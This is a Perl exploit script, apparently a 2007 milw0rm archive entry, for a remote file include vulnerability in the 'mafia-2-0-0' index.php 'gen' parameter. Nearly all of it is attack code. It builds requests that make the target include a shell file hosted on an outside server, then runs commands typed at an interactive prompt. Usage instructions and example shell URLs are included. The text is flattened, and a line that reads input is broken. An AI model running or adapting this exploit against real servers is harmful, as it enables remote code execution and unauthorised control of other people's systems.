#!/usr/bin/perl ########################################################################################################## # # # mafia-2-0-0 (Index.php)Remote File Include Vulnerability # # # # Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Pantagon # # # # Class: Remote File Include Vulnerability # # # # exemplary Exp: http://www.site.com/index.php?gen= # # # # Remote: Yes # # # # Type: Highly critical # # # # Vulnerable Code:include($gen."header.php"); # # # # Download:http://switch.dl.sourceforge.net/sourceforge/adv-random-gen/mafia-2-0-0.tar.gz # # # # Ptach : www.Advistory.deltasecurity.ir # # # # Bug Found : DeltahackingTEAM Exploitet Discovered & Exploitet: Dr.Pantagon; while ($cmd !~ "exit") { $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $r = $res->content; $r =~ tr/[\n]/[ê]/; if (@ARGV[4] eq "-r") { print $r; } elsif (@ARGV[5] eq "-p") { # if not working change cmd variable to null and apply patch manually. $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc"; print q { } } else { print "[cmd]\$"; $cmd = ; } } sub header() { print q { ################################################################################# Only Str0ke Bug Found : DeltahackingTEAM mafia.pl - Remote File Include Exploit Vulnerability discovered and exploitet by Dr.Pantagon Dr.Pantagon@Gmail.com www.DeltaSecurity.ir ################################################################################# }; } sub usage() { header(); print q { ######################################################################## Usage: perl mafia.pl <-r> <-p> - Path to target eg: www.lashiyane.org - Path to shell eg: d4wood.by.ru/cmd.gif - Shell command variable name eg: Pwd - Show output from shell

- index.php Example: perl mafia.pl http://localhost/include http://localhost/s.txt cmd -r -p ######################################################################## }; exit(); } # milw0rm.com [2007-01-21]